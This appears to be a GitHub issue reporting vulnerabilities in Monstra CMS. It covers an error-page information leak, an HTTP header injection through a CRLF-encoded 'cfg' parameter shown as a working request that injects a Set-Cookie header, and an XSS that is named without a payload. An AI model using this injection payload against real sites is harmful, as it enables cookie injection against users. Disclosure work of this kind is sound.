HTTP/1.1 200 OK
Date: Fri, 07 Sep 2018 06:50:53 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cryptcookietest=1
Content-Length: 215
Connection: close
Content-Type: text/html; charset=UTF-8
<b>Warning</b>: Header may not contain more than a single header, new line detected in <b>D:\install\phpstudy\PHPTutorial\WWW\monstra-master\plugins\captcha\crypt\cryptographp.php</b> on line <b>5</b><br />
part 1 sensitive information leakage
request:
http://site.com/monstra-master/libraries/Gelato/ErrorHandler/Resources/Views/Errors/exception.phpthe response error message obtains sensitive information
part 2 http header injection
Request:
/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20mycookie=hell
part 3 XSS
request by post
The text was updated successfully, but these errors were encountered: